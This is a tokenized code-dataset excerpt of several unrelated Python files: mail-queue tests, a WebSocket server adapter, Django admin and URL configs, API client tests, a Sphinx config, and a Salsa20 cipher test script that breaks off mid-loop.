<s> from lamson import queue , server , mail <EOL> from nose . tools import * <EOL> import shutil <EOL> import os <EOL> from mock import * <EOL> import mailbox <EOL> USE_SAFE = False <EOL> def setup ( ) : <EOL> if os . path . exists ( "<STR_LIT>" ) : <EOL> shutil . rmtree ( "<STR_LIT>" ) <EOL> def teardown ( ) : <EOL> setup ( ) <EOL> def test_push ( ) : <EOL> q = queue . Queue ( "<STR_LIT>" , safe = USE_SAFE ) <EOL> q . clear ( ) <EOL> msg = mail . MailResponse ( To = "<STR_LIT>" , From = "<STR_LIT>" , <EOL> Subject = "<STR_LIT>" , Body = "<STR_LIT>" ) <EOL> key = q . push ( msg ) <EOL> assert key , "<STR_LIT>" <EOL> return q <EOL> def test_pop ( ) : <EOL> q = test_push ( ) <EOL> key , msg = q . pop ( ) <EOL> assert key , "<STR_LIT>" <EOL> assert msg , "<STR_LIT>" % key <EOL> assert msg [ '<STR_LIT:to>' ] == "<STR_LIT>" <EOL> assert msg [ '<STR_LIT>' ] == "<STR_LIT>" <EOL> assert msg [ '<STR_LIT>' ] == "<STR_LIT>" <EOL> assert msg . body ( ) == "<STR_LIT>" <EOL> assert q . count ( ) == <NUM_LIT:0> , "<STR_LIT>" <EOL> assert not q . pop ( ) [ <NUM_LIT:0> ] <EOL> def test_get ( ) : <EOL> q = test_push ( ) <EOL> msg = mail . MailResponse ( To = "<STR_LIT>" , From = "<STR_LIT>" , <EOL> Subject = "<STR_LIT>" , Body = "<STR_LIT>" ) <EOL> key = q . push ( str ( msg ) ) <EOL> assert key , "<STR_LIT>" <EOL> msg = q . get ( key ) <EOL> assert msg , "<STR_LIT>" % key <EOL> def test_remove ( ) : <EOL> q = test_push ( ) <EOL> msg = mail . MailResponse ( To = "<STR_LIT>" , From = "<STR_LIT>" , <EOL> Subject = "<STR_LIT>" , Body = "<STR_LIT>" ) <EOL> key = q . push ( str ( msg ) ) <EOL> assert key , "<STR_LIT>" <EOL> assert q . count ( ) == <NUM_LIT:2> , "<STR_LIT>" % q . count ( ) <EOL> q . remove ( key ) <EOL> assert q . count ( ) == <NUM_LIT:1> , "<STR_LIT>" % q . count ( ) <EOL> def test_safe_maildir ( ) : <EOL> global USE_SAFE <EOL> USE_SAFE = True <EOL> test_push ( ) <EOL> test_pop ( ) <EOL> test_get ( ) <EOL> test_remove ( ) <EOL> def test_oversize_protections ( ) : <EOL> overq = queue . Queue ( "<STR_LIT>" , pop_limit = <NUM_LIT:10> ) <EOL> overq . clear ( ) <EOL> for i in range ( <NUM_LIT:5> ) : <EOL> overq . push ( "<STR_LIT>" * <NUM_LIT:100> ) <EOL> assert_equal ( overq . count ( ) , <NUM_LIT:5> ) <EOL> key , msg = overq . pop ( ) <EOL> assert not key and not msg , "<STR_LIT>" <EOL> assert_equal ( overq . count ( ) , <NUM_LIT:0> ) <EOL> setup ( ) <EOL> overq = queue . Queue ( "<STR_LIT>" , pop_limit = <NUM_LIT:10> , oversize_dir = "<STR_LIT>" ) <EOL> moveq = queue . Queue ( "<STR_LIT>" ) <EOL> for i in range ( <NUM_LIT:5> ) : <EOL> overq . push ( "<STR_LIT>" * <NUM_LIT:100> ) <EOL> key , msg = overq . pop ( ) <EOL> assert not key and not msg , "<STR_LIT>" <EOL> assert_equal ( overq . count ( ) , <NUM_LIT:0> ) <EOL> assert_equal ( moveq . count ( ) , <NUM_LIT:5> ) <EOL> moveq . clear ( ) <EOL> overq . clear ( ) <EOL> @ patch ( '<STR_LIT>' , new = Mock ( ) ) <EOL> @ raises ( mailbox . ExternalClashError ) <EOL> def test_SafeMaildir_name_clash ( ) : <EOL> try : <EOL> shutil . rmtree ( "<STR_LIT>" ) <EOL> except : pass <EOL> sq = queue . SafeMaildir ( '<STR_LIT>' ) <EOL> sq . add ( "<STR_LIT>" ) <EOL> def raise_OSError ( * x , ** kw ) : <EOL> err = OSError ( '<STR_LIT>' ) <EOL> err . errno = <NUM_LIT:0> <EOL> raise err <EOL> @ patch ( '<STR_LIT>' , new = Mock ( ) ) <EOL> @ raises ( OSError ) <EOL> def test_SafeMaildir_throws_errno_failure ( ) : <EOL> setup ( ) <EOL> mailbox . _create_carefully . side_effect = raise_OSError <EOL> sq = queue . SafeMaildir ( '<STR_LIT>' ) <EOL> sq . add ( "<STR_LIT>" ) <EOL> @ patch ( '<STR_LIT>' , new = Mock ( ) ) <EOL> @ raises ( OSError ) <EOL> def test_SafeMaildir_reraise_weird_errno ( ) : <EOL> try : <EOL> shutil . rmtree ( "<STR_LIT>" ) <EOL> except : pass <EOL> os . stat . side_effect = raise_OSError <EOL> sq = queue . SafeMaildir ( '<STR_LIT>' ) <EOL> sq . add ( '<STR_LIT>' ) </s>
<s> import logging <EOL> from bottle import ServerAdapter <EOL> from gevent import pywsgi <EOL> from geventwebsocket . handler import WebSocketHandler <EOL> from geventwebsocket . logging import create_logger <EOL> class GeventWebSocketServer ( ServerAdapter ) : <EOL> def run ( self , handler ) : <EOL> server = pywsgi . WSGIServer ( ( self . host , self . port ) , handler , handler_class = WebSocketHandler ) <EOL> if not self . quiet : <EOL> server . logger = create_logger ( '<STR_LIT>' ) <EOL> server . logger . setLevel ( logging . INFO ) <EOL> server . logger . addHandler ( logging . StreamHandler ( ) ) <EOL> server . serve_forever ( ) </s>
<s> from django . contrib import admin <EOL> from django . core . urlresolvers import reverse <EOL> from django . utils . safestring import mark_safe <EOL> from authorizenet . models import ( Response , CIMResponse , CustomerProfile , <EOL> CustomerPaymentProfile ) <EOL> from authorizenet . forms import CustomerPaymentForm , CustomerPaymentAdminForm <EOL> from relatives . utils import object_edit_link <EOL> class ResponseAdmin ( admin . ModelAdmin ) : <EOL> list_display = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> readonly_fields = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:description>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:type>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:address>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:state>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:email>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> admin . site . register ( Response , ResponseAdmin ) <EOL> class CIMResponseAdmin ( admin . ModelAdmin ) : <EOL> list_display = [ '<STR_LIT>' , <EOL> '<STR_LIT:result>' ] <EOL> readonly_fields = [ '<STR_LIT:result>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> exclude = [ '<STR_LIT>' ] <EOL> def response_link ( self , obj ) : <EOL> change_url = reverse ( '<STR_LIT>' , <EOL> args = ( obj . transaction_response . id , ) ) <EOL> return mark_safe ( '<STR_LIT>' % ( change_url , <EOL> obj . transaction_response ) ) <EOL> response_link . short_description = '<STR_LIT>' <EOL> admin . site . register ( CIMResponse , CIMResponseAdmin ) <EOL> class CustomerPaymentProfileInline ( admin . TabularInline ) : <EOL> model = CustomerPaymentProfile <EOL> form = CustomerPaymentForm <EOL> fields = [ object_edit_link ( "<STR_LIT>" ) , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> readonly_fields = fields <EOL> extra = <NUM_LIT:0> <EOL> max_num = <NUM_LIT:0> <EOL> can_delete = False <EOL> class CustomerProfileAdmin ( admin . ModelAdmin ) : <EOL> list_display = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> readonly_fields = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> inlines = [ CustomerPaymentProfileInline ] <EOL> def get_readonly_fields ( self , request , obj = None ) : <EOL> return self . readonly_fields if obj is not None else [ '<STR_LIT>' ] <EOL> admin . site . register ( CustomerProfile , CustomerProfileAdmin ) <EOL> class CustomerPaymentProfileAdmin ( admin . ModelAdmin ) : <EOL> list_display = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> readonly_fields = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> form = CustomerPaymentAdminForm <EOL> def get_readonly_fields ( self , request , obj = None ) : <EOL> return self . readonly_fields if obj is not None else [ ] <EOL> admin . site . register ( CustomerPaymentProfile , CustomerPaymentProfileAdmin ) </s>
<s> from django . conf . urls import url , include , patterns <EOL> from django . conf import settings <EOL> from django . views . generic . base import RedirectView <EOL> from django . contrib . staticfiles . urls import staticfiles_urlpatterns <EOL> from django . contrib import admin <EOL> admin . autodiscover ( ) <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , RedirectView . as_view ( url = '<STR_LIT>' ) ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> url ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> url ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> url ( r'<STR_LIT>' , include ( admin . site . urls ) ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : settings . MEDIA_ROOT } ) , <EOL> ) <EOL> urlpatterns += staticfiles_urlpatterns ( ) </s>
<s> import unittest <EOL> from zencoder import Zencoder <EOL> from mock import patch <EOL> from test_util import TEST_API_KEY , load_response <EOL> from zencoder import Zencoder <EOL> class TestOutputs ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . zen = Zencoder ( api_key = TEST_API_KEY ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_output_details ( self , get ) : <EOL> get . return_value = load_response ( <NUM_LIT:200> , '<STR_LIT>' ) <EOL> resp = self . zen . output . details ( <NUM_LIT> ) <EOL> self . assertEquals ( resp . code , <NUM_LIT:200> ) <EOL> self . assertTrue ( resp . body [ '<STR_LIT:id>' ] > <NUM_LIT:0> ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_output_progress ( self , get ) : <EOL> get . return_value = load_response ( <NUM_LIT:200> , '<STR_LIT>' ) <EOL> resp = self . zen . output . progress ( <NUM_LIT> ) <EOL> self . assertEquals ( resp . code , <NUM_LIT:200> ) <EOL> self . assertEquals ( resp . body [ '<STR_LIT:state>' ] , '<STR_LIT>' ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> import sys <EOL> import os <EOL> from sphinx . ext import autodoc <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:..>' ) ) <EOL> needs_sphinx = '<STR_LIT>' <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> intersphinx_mapping = { '<STR_LIT>' : ( '<STR_LIT>' , None ) } <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> import zvshlib <EOL> version = zvshlib . __version__ <EOL> release = version <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT>' <EOL> from zerovm_sphinx_theme import theme_path <EOL> html_theme_path = [ theme_path ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> from __future__ import print_function <EOL> """<STR_LIT>""" <EOL> _version = '<STR_LIT>' <EOL> from struct import Struct <EOL> little16_i32 = Struct ( "<STR_LIT>" ) <EOL> native16_i32 = Struct ( "<STR_LIT>" ) <EOL> from ctypes import c_buffer <EOL> from sys import argv <EOL> import binascii <EOL> def patch_pySalsa20 ( ) : <EOL> """<STR_LIT>""" <EOL> class Testing_pysalsa20 ( pySalsa20 . Salsa20 ) : <EOL> def salsa20core ( self , input , nRounds ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> libSalsa20 . set_rounds ( nRounds ) <EOL> except : <EOL> msg = '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT>' <EOL> print ( msg ) <EOL> assert type ( input ) == bytes , '<STR_LIT>' <EOL> assert len ( input ) == <NUM_LIT:64> , '<STR_LIT>' <EOL> NUL_message = c_buffer ( <NUM_LIT:64> ) <EOL> output = c_buffer ( <NUM_LIT:64> ) <EOL> ctx = native16_i32 . pack ( * little16_i32 . unpack ( input ) ) <EOL> libSalsa20 . ECRYPT_encrypt_bytes ( ctx , NUL_message , output , <NUM_LIT:64> ) <EOL> return output . raw [ : <NUM_LIT:64> ] <EOL> def force_nRounds ( self , nRounds ) : <EOL> """<STR_LIT>""" <EOL> libSalsa20 . set_rounds ( nRounds ) <EOL> return Testing_pysalsa20 <EOL> def patch_pureSalsa20 ( ) : <EOL> """<STR_LIT>""" <EOL> class Testing_puresalsa20 ( pureSalsa20 . Salsa20 ) : <EOL> def salsa20core ( self , input , nRounds ) : <EOL> assert type ( input ) == bytes , '<STR_LIT>' <EOL> assert len ( input ) == <NUM_LIT:64> , '<STR_LIT>' <EOL> ctx = little16_i32 . unpack ( input ) <EOL> w2b = pureSalsa20 . salsa20_wordtobyte <EOL> return w2b ( ctx , nRounds , checkRounds = False ) <EOL> def force_nRounds ( self , nRounds ) : <EOL> """<STR_LIT>""" <EOL> self . setRounds ( nRounds , testing = True ) <EOL> return Testing_puresalsa20 <EOL> def trunc32 ( w ) : <EOL> """<STR_LIT>""" <EOL> w = int ( ( w & <NUM_LIT> ) | ( - ( w & <NUM_LIT> ) ) ) <EOL> assert type ( w ) == int <EOL> return w <EOL> def t32 ( a ) : return tuple ( trunc32 ( x ) for x in a ) <EOL> input_block = t32 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> below_diag = t32 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> below_below = t32 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> continues_down = t32 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> modifies_diag = t32 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> one_round = t32 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> two_rounds = t32 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> twenty_rounds = t32 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> output_block = t32 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> def test_salsa20core ( module , module_name ) : <EOL> print ( "<STR_LIT>" + module_name + "<STR_LIT>" + "<STR_LIT>" ) <EOL> passed = True <EOL> input_block_packed = little16_i32 . pack ( * input_block ) <EOL> assert little16_i32 . unpack ( input_block_packed ) == input_block <EOL> s20 = salsa20_test_classes [ module_name ] ( ) <EOL> x = s20 . salsa20core ( little16_i32 . pack ( * input_block ) , <NUM_LIT:2> ) <EOL> y = t32 ( ti + ii for ( ti , ii ) in zip ( two_rounds , input_block ) ) <EOL> if little16_i32 . unpack ( x ) != y : <EOL> print ( "<STR_LIT>" , end = "<STR_LIT:U+0020>" ) <EOL> print ( "<STR_LIT>" ) <EOL> passed = False <EOL> x = s20 . salsa20core ( little16_i32 . pack ( * input_block ) , <NUM_LIT:20> ) <EOL> if little16_i32 . unpack ( x ) != output_block : <EOL> print ( "<STR_LIT>" , end = "<STR_LIT:U+0020>" ) <EOL> print ( "<STR_LIT>" ) <EOL> passed = False <EOL> if passed : <EOL> print ( "<STR_LIT>" ) <EOL> return passed <EOL> def rot32long ( w , nLeft ) : <EOL> """<STR_LIT>""" <EOL> w &= <NUM_LIT> <EOL> nLeft &= <NUM_LIT> <EOL> w = ( w << nLeft ) | ( w >> ( <NUM_LIT:32> - nLeft ) ) <EOL> return int ( ( w & <NUM_LIT> ) | ( - ( w & <NUM_LIT> ) ) ) <EOL> def test_add32 ( add32 , name ) : <EOL> import random <EOL> print ( "<STR_LIT>" + name + "<STR_LIT>" ) <EOL> passed = True <EOL> groups = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ] <EOL> ng = len ( groups ) <EOL> inputs = [ ] <EOL> for i in range ( <NUM_LIT:2> ** ng ) : <EOL> inputs . append ( sum ( [ groups [ p ] for p in range ( ng ) if ( <NUM_LIT:1> << p ) & i ] ) ) <EOL> for i in range ( <NUM_LIT:2> ** ng ) : <EOL> inputs . append ( int ( random . randrange ( - <NUM_LIT:1> << <NUM_LIT> , <NUM_LIT:1> << <NUM_LIT> ) ) ) <EOL> for a in inputs : <EOL> for b in inputs : <EOL> x = add32 ( a , b ) <EOL> y = trunc32 ( a + b ) <EOL> if x != y : <EOL> print ( name + ( <EOL> "<STR_LIT>" % ( <EOL> a & <NUM_LIT> , b & <NUM_LIT> , x & <NUM_LIT> , <EOL> y & <NUM_LIT> ) <EOL> ) ) <EOL> passed = False <EOL> if type ( x ) != type ( <NUM_LIT:0> ) : <EOL> print ( name + "<STR_LIT>" % ( <EOL> a & <NUM_LIT> , b & <NUM_LIT> , x & <NUM_LIT> , <EOL> ) + type ( x ) ) <EOL> passed = False <EOL> if passed : <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> return passed <EOL> from time import time <EOL> print ( "<STR_LIT>" ) <EOL> start = time ( ) <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> a = int ( random . randrange ( - <NUM_LIT:1> << <NUM_LIT> , <NUM_LIT:1> << <NUM_LIT> ) ) <EOL> for j in range ( <NUM_LIT:100> ) : <EOL> b = int ( random . randrange ( - <NUM_LIT:1> << <NUM_LIT> , <NUM_LIT:1> << <NUM_LIT> ) ) <EOL> for k in range ( <NUM_LIT:10> ) : <EOL> add32 ( a , b ) <EOL> add32 ( a , b ) <EOL> add32 ( a , b ) <EOL> add32 ( a , b ) <EOL> add32 ( a , b ) <EOL> add32 ( a , b ) <EOL> add32 ( a , b ) <EOL> add32 ( a , b ) <EOL> add32 ( a , b ) <EOL> add32 ( a , b ) <EOL> duration = time ( ) - start <EOL> nCalls = <NUM_LIT:100> * <NUM_LIT:100> * <NUM_LIT:10> * <NUM_LIT:10> <EOL> print ( "<STR_LIT>" , duration / nCalls , "<STR_LIT>" , <EOL> nCalls / duration , "<STR_LIT>" ) <EOL> return passed <EOL> def test_rot32 ( rot32 , name ) : <EOL> import random <EOL> print ( "<STR_LIT>" , name , "<STR_LIT>" ) <EOL> passed = True <EOL> for j in range ( - <NUM_LIT:32> , <NUM_LIT> ) : <EOL> for i in range ( <NUM_LIT:32> ) : <EOL> w = trunc32 ( <NUM_LIT:1> << i ) <EOL> x = rot32 ( w , j ) <EOL> y = trunc32 ( <NUM_LIT:1> << ( ( i + j ) & <NUM_LIT> ) ) <EOL> if x != y : <EOL> print ( name + "<STR_LIT>" % ( <EOL> w & <NUM_LIT> , j , x & <NUM_LIT> , y & <NUM_LIT> ) ) <EOL> passed = False <EOL> if type ( x ) != type ( <NUM_LIT:0> ) : <EOL> print ( name + "<STR_LIT>" % ( <EOL> w & <NUM_LIT> , j , x & <NUM_LIT> ) , type ( x ) ) <EOL> passed = False <EOL> if passed : <EOL> w = int ( random . randrange ( - <NUM_LIT:1> << <NUM_LIT> , <NUM_LIT:1> << <NUM_LIT> ) ) <EOL> x = rot32 ( w , j ) <EOL> y = rot32 ( x , - j ) <EOL> if y != w : <EOL> print ( name + "<STR_LIT>" % ( <EOL> w & <NUM_LIT> , j , x & <NUM_LIT> ) , end = "<STR_LIT>" ) <EOL> print ( name + "<STR_LIT>" % ( <EOL> x & <NUM_LIT> , - j , y & <NUM_LIT> ) ) <EOL> passed = False <EOL> if passed : <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> return passed <EOL> from time import time <EOL> print ( "<STR_LIT>" ) <EOL> start = time ( ) <EOL> for k in range ( <NUM_LIT:100> ) : <EOL> w = int ( random . randrange ( - <NUM_LIT:1> << <NUM_LIT> , <NUM_LIT:1> << <NUM_LIT> ) ) <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> for j in range ( - <NUM_LIT> , <NUM_LIT:32> ) : <EOL> rot32 ( w , j ) <EOL> rot32 ( w , j ) <EOL> rot32 ( w , j ) <EOL> rot32 ( w , j ) <EOL> rot32 ( w , j ) <EOL> rot32 ( w , j ) <EOL> rot32 ( w , j ) <EOL> rot32 ( w , j ) <EOL> rot32 ( w , j ) <EOL> rot32 ( w , j ) <EOL> duration = time ( ) - start <EOL> nCalls = <NUM_LIT:100> * <NUM_LIT:10> * <NUM_LIT> * <NUM_LIT:10> <EOL> print ( "<STR_LIT>" , duration / nCalls , "<STR_LIT>" , end = "<STR_LIT>" ) <EOL> print ( nCalls / duration , "<STR_LIT>" ) <EOL> return passed <EOL> def savetofile ( filename , content ) : <EOL> "<STR_LIT>" <EOL> f = open ( filename , '<STR_LIT:wb>' ) <EOL> f . write ( content ) <EOL> f . close ( ) <EOL> def loadfmfile ( filename ) : <EOL> "<STR_LIT>" <EOL> f = open ( filename , '<STR_LIT:rb>' ) <EOL> content = f . read ( ) <EOL> f . close ( ) <EOL> return content <EOL> def bytestring ( hex ) : <EOL> "<STR_LIT>" <EOL> return binascii . unhexlify ( hex . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) ) <EOL> def test ( module , module_name ) : <EOL> print ( "<STR_LIT>" , module_name , "<STR_LIT:version>" , module . _version , "<STR_LIT>" ) <EOL> from sys import stdout <EOL> passed = True <EOL> if <NUM_LIT:1> : <EOL> if "<STR_LIT>" in module . __dict__ : <EOL> passed &= test_rot32 ( module . rot32 , module_name + "<STR_LIT>" ) <EOL> passed &= test_rot32 ( rot32long , "<STR_LIT>" ) <EOL> print ( ) <EOL> if "<STR_LIT>" in module . __dict__ : <EOL> passed &= test_add32 ( module . add32 , module_name + "<STR_LIT>" ) <EOL> if <NUM_LIT:1> and passed : <EOL> test_salsa20core ( module , module_name ) <EOL> if <NUM_LIT:1> and passed : <EOL> rounds = <NUM_LIT:8> <EOL> if <NUM_LIT:0> : <EOL> message = loadfmfile ( '<STR_LIT>' ) <EOL> else : <EOL> message = b'<STR_LIT>' <EOL> key = b'<STR_LIT>' <EOL> nonce = b'<STR_LIT>' <EOL> IV = ( nonce + b'<STR_LIT:*>' * <NUM_LIT:8> ) [ : <NUM_LIT:8> ] <EOL> print ( "<STR_LIT>" ) <EOL> s20 = salsa20_test_classes [ module_name ] ( key , IV , rounds ) <EOL> ciphertxt = s20 . encryptBytes ( message ) <EOL> s20 = salsa20_test_classes [ module_name ] ( key , IV , rounds ) <EOL> plaintxt = s20 . encryptBytes ( ciphertxt ) <EOL> if message == plaintxt : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' ) <EOL> passed = False <EOL> if <NUM_LIT:1> and passed : <EOL> print ( "<STR_LIT>" ) <EOL> rounds = <NUM_LIT:8> <EOL> message = b'<STR_LIT:\x00>' * <NUM_LIT:64> <EOL> key = binascii . unhexlify ( '<STR_LIT>' ) <EOL> IV = binascii . unhexlify ( '<STR_LIT>' ) <EOL> out64 = bytestring ( """<STR_LIT>""" ) <EOL> s20 = salsa20_test_classes [ module_name ] ( key , IV , rounds ) <EOL> s20 . setIV ( IV ) <EOL> ciphertxt = s20 . encryptBytes ( message ) <EOL> s20 = salsa20_test_classes [ module_name ] ( key , IV , rounds ) <EOL> plaintxt = s20 . encryptBytes ( ciphertxt ) <EOL> if ( message == plaintxt and <EOL> ciphertxt [ : <NUM_LIT:64> ] == out64 ) : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' ) <EOL> passed = False <EOL> if <NUM_LIT:1> and passed : <EOL> print ( "<STR_LIT>" ) <EOL> rounds = <NUM_LIT:8> <EOL> message = b'<STR_LIT:\x00>' * <NUM_LIT> <EOL> key = binascii . unhexlify ( '<STR_LIT>' ) <EOL> IV = binascii . unhexlify ( '<STR_LIT>' ) <EOL> out64 = bytestring ( """<STR_LIT>""" ) <EOL> out65536 = bytestring ( """<STR_LIT>""" ) <EOL> s20 = salsa20_test_classes [ module_name ] ( key , IV , rounds ) <EOL> ciphertxt = s20 . encryptBytes ( message ) <EOL> s20 = salsa20_test_classes [ module_name ] ( key , IV , rounds ) <EOL> plaintxt = s20 . encryptBytes ( ciphertxt ) <EOL> if ( message == plaintxt and <EOL> ciphertxt [ : <NUM_LIT:64> ] == out64 and <EOL> ciphertxt [ <NUM_LIT> : ] == out65536 ) : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' ) <EOL> passed = False <EOL> if <NUM_LIT:1> and passed : <EOL> from time import time <EOL> from math import ceil <EOL> print ( "<STR_LIT>" ) <EOL> names = { } <EOL> speeds = { } <EOL> message_lens = [ <NUM_LIT:64> , <NUM_LIT:2> ** <NUM_LIT:16> ] <EOL> namefmt = "<STR_LIT>" <EOL> print ( namefmt % "<STR_LIT:U+0020>" , end = "<STR_LIT:U+0020>" ) <EOL> msg_len_fmt = "<STR_LIT>" <EOL> speed_fmt = "<STR_LIT>" <EOL> for msg_len 